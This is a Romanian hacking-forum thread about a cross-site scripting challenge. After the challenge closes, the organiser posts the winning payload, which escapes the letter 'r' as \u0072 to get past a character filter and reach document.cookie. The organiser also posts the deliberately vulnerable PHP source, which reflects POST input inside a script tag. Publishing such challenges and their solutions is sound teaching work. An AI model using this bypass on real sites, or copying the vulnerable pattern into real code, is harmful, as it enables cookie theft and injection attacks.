Open Posted November 7, 2014 Report Posted November 7, 2014 (edited) Link: 6f70656e2d6368616c6c616e67652e3266682e636fDificultatea: Mediu - HardCerinte: Executarea codului "document.cookie" pentru a valida challange-ul. Dupa rezolvarea chlallenge-ului se trimite vectorul pe privat, Si la alegerea voastra daca vreti sa postati poza sau nu. - Castigatori ---------------------------------- @abraxyss Edited November 8, 2014 by Open Quote
Open Posted November 7, 2014 Author Report Posted November 7, 2014 Daca si asta e hard...Vectorul trimis de tine, nu acctioneaza document.cookie. Quote
Byte-ul Posted November 7, 2014 Report Posted November 7, 2014 Vectorul trimis de tine, nu acctioneaza document.cookie.Ai modificat tu scriptul. La inceput mergea "+document.cookie+". Quote
Open Posted November 9, 2014 Author Report Posted November 9, 2014 (edited) Challenge closedOrice mesaj privat, sau orice replay cu rezolvarea challenge-ului nu mai este luata in considerare.Rezolvare:mesaj");ale\u0072t(document.cookie);//De ce?Parametru vulnerabil este$POST = str_replace($array,null,($_POST['xss']));[*]Pana aici tot este normal doar ca acele caractere filtrate sunt acestea$array=array("<",">"," "," ","r","'","+","=",);[*]Parametru "POST" se reflecta aici$mesaj = '<script>alert("'.(str_replace($array,null,($POST))).'")</script>';[*]Vine in felul urmator<script>alert("parametru")</script>Acum trebuie sa iesi din script, trebuie sa inchizi acel "alert"mesaj")in codul sursa va aparea <script>alert("mesaj");Acum poti trece sa completezi cu document.cookie, doar ca in array este blocata si litera "r"Deci trebuie sa criptezi litera respectiva decir va deveni \u0072, Deci la sfarsit va arata cam asamesaj");ale\u0072t(document.cookie);//Codul sursa este urmatorul.<?phperror_reporting(1);if(isset($_POST['xss'])){ $array=array("<",">"," "," ","r","'","+","=",); $image = 'http://www.law.msu.edu/alumni/alumni_media/challenge.gif'; $parametru = 'POST'; $cod = "123456789"; $request = 'xss'; $POST = str_replace($array,null,($_POST['xss'])); $mesaj = '<script>alert("'.(str_replace($array,null,($POST))).'")</script>'; setcookie('salut',base64_encode('-'.$cod.'-'),time()+3600); $news = '<center><img src="'.$image.'"/><br><br><br> <form action="" method="'.$parametru.'"> <input type="text" name="'.$request.'" /> <input type="submit" name="submit" value="submit" /> </form></center>'; $rezultat = "<b><center>".htmlentities(str_replace('r',null,$POST))."</center></b>";}else{ $image = 'http://www.law.msu.edu/alumni/alumni_media/challenge.gif'; $parametru = 'POST'; $request = 'xss'; $mesaj=' <center> <img src="'.$image.'"/><br><br><br> <form action="" method="'.$parametru.'"> <input type="text" name="'.$request.'" /> <input type="submit" name="submit" value="submit" /> </form> </center>';} echo $news; echo $rezultat; echo $mesaj;?> Edited March 7, 2015 by Open Quote
